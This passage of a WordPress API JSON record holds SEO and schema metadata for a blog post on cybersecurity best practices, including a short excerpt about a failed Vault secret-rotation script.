Guides\",\"publisher\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/itsupportwale.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#organization\",\"name\":\"itsupportwale\",\"url\":\"https:\/\/itsupportwale.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2023\/09\/cropped-Logo-trans-without-slogan.png\",\"contentUrl\":\"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2023\/09\/cropped-Logo-trans-without-slogan.png\",\"width\":1119,\"height\":144,\"caption\":\"itsupportwale\"},\"image\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Itsupportwale-298547177495978\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#\/schema\/person\/8c5a2b3d36396e0a8fd91ec8242fd46d\",\"name\":\"Techie\",\"sameAs\":[\"https:\/\/itsupportwale.com\",\"iswblogadmin\"],\"url\":\"https:\/\/itsupportwale.com\/blog\/author\/iswblogadmin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","og_locale":"en_US","og_type":"article","og_title":"10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale","og_description":"Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token ... Read more","og_url":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","og_site_name":"ITSupportWale","article_publisher":"https:\/\/www.facebook.com\/Itsupportwale-298547177495978","article_published_time":"2026-05-08T16:21:58+00:00","og_image":[{"width":512,"height":512,"url":"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2021\/05\/android-chrome-512x512-1.png","type":"image\/png"}],"author":"Techie","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Techie","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#article","isPartOf":{"@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/"},"author":{"name":"Techie","@id":"https:\/\/itsupportwale.com\/blog\/#\/schema\/person\/8c5a2b3d36396e0a8fd91ec8242fd46d"},"headline":"10 Essential Cybersecurity Best Practices to Stay Safe","datePublished":"2026-05-08T16:21:58+00:00","mainEntityOfPage":{"@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/"},"wordCount":2329,"commentCount":0,"publisher":{"@id":"https:\/\/itsupportwale.com\/blog\/#organization"},"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","url":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","name":"10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale","isPartOf":{"@id":"https:\/\/itsupportwale.com\/blog\/#website"},"datePublished":"2026-05-08T16:21:58+00:00","breadcrumb":{"@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/itsupportwale.com\/blog\/"},{"@type":"ListItem","position":2,"name":"10 Essential Cybersecurity Best Practices to Stay Safe"}]},{"@type":"WebSite","@id":"https:\/\/itsupportwale.com\/blog\/#website","url":"https:\/\/itsupportwale.com\/blog\/","name":"ITSupportWale","description":"Tips, Tricks, Fixed-Errors, Tutorials &amp; Guides","publisher":{"@id":"https:\/\/itsupportwale.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/itsupportwale.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/itsupportwale.com\/blog\/#organization","name":"itsupportwale","url":"https:\/\/itsupportwale.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/itsupportwale.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2023\/09\/cropped-Logo-trans-without-slogan.png","contentUrl":"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2023\/09\/cropped-Logo-trans-without-slogan.png","width":1119,"height":144,"caption":"itsupportwale"},"image":{"@id":"https:\/\/itsupportwale.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Itsupportwale-298547177495978"]},{"@type":"Person","@id":"https:\/\/itsupportwale.com\/blog\/#\/schema\/person\/8c5a2b3d36396e0a8fd91ec8242fd46d","name":"Techie","sameAs":["https:\/\/itsupportwale.com","iswblogadmin"],"url":"https:\/\/itsupportwale.com\/blog\/author\/iswblogadmin\/"}]}},"_links":{"self":[{"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/posts\/4783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/comments?post=4783"}],"version-history":[{"count":0,"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/posts\/4783\/revisions"}],"wp:attachment":[{"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/media?parent=4783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/categories?post=4783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/tags?post=4783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}